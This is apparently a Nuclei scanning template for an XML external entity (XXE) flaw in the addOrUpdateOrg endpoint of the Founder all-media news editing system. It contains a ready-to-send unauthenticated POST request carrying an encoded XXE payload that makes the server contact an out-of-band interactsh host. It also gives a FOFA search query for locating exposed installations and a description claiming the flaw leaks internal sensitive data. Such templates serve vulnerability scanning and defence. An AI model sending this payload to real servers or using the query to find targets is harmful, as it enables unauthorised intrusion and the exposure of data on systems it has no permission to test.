http:
    - matchers:
        - part: interactsh_protocol
          type: word
          words:
            - dns
      raw:
        - |
          POST /newsedit/api/orgUser/addOrUpdateOrg HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
          Content-Type: application/x-www-form-urlencoded

          xmlStr=%3C!DOCTYPE%20root%20%5B%20%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http://{{interactsh-url}}%22%3E%20%25remote;%5D%3E
id: fangzheng-addOrUpdateOrg-XXE
info:
    author: Superhero
    description: |-
        fofa: app="FOUNDER-全媒体采编系统"
        方正畅享全媒体新闻采编系统 addOrUpdateOrg 接口处存在XML实体注入漏洞，未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据，使系统处于极不安全状态。
    name: 方正畅享全媒体新闻采编系统 addOrUpdateOrg XXE漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488027&idx=1&sn=6962fe1d776466e04ac4652b8ee38c1c&chksm=c267a728f5102e3eb48f4fa820dccf89d3d4333c03153a41428b998f728299d66309dbbdd4ab&token=48786214&lang=zh_CN#rd
    severity: high
    tags:
        - XXE
        - 方正畅享全媒体新闻采编系统
